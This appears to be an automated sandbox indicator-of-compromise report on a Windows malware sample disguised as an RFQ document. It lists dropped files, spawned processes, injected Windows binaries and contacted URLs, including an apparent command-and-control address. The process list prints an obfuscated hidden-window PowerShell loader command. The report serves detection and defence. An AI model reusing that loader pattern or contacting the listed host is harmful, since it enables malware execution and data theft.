IOC Report
RFQ-SulselBarruII2-COALCOMMLDOC.exe


Files

File Path | Type | Category | Malicious
RFQ-SulselBarruII2-COALCOMMLDOC.exe | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | initial sample | malicious
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | dropped | malicious
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd | ASCII text, with very long lines (61450), with no line terminators | dropped | malicious
C:\Program Files (x86)\Common Files\ukases.lnk | MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide | dropped |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsjlhnjp.qwc.psm1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qr5yvafi.dw1.ps1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Behandlingsmaal.sac | data | dropped |
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Kliniklokalernes.sun | data | dropped |
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Potatory.rea | FoxPro FPT, blocks size 16640, next free block index 173, field type 0 | dropped |
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe:Zone.Identifier | ASCII text, with CRLF line terminators | dropped |
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Reluktansernes.Ove71 | data | dropped |
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\teda.txt | ASCII text, with CRLF line terminators | dropped |
C:\Users\user\AppData\Roaming\188E93\31437F.lck | very short file (no magic) | dropped |
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06 | data | dropped |

Processes

Path | Cmdline | Malicious
C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe | "C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe" | malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)" | malicious
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" | malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" | malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" | malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" | malicious
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" | malicious
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |
C:\Program Files (x86)\Windows Mail\wab.exe | "C:\Program Files (x86)\windows mail\wab.exe" |

URLs

Name | IP | Malicious
http://ebnsina.top/project/five/fre.php | 104.21.13.124 | malicious
http://pesterbdd.com/images/Pester.png | unknown | malicious
https://www.google.com | unknown |
http://nuget.org/NuGet.exe | unknown |
https://aka.ms/pscore6lB | unknown |
http://crl.microsoft | unknown |
http://www.apache.org/licenses/LICENSE-2.0.html | unknown |
https://drive.google.com/ | unknown |
https://contoso.com/ | unknown |
https://nuget.org/nuget.exe | unknown |
https://contoso.com/License | unknown |
https://contoso.com/Icon | unknown |
https://drive.usercontent.google.com/ | unknown |
https://apis.google.com | unknown |
http://nsis.sf.net/NSIS_ErrorError | unknown |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown |
https://github.com/Pester/Pester | unknown |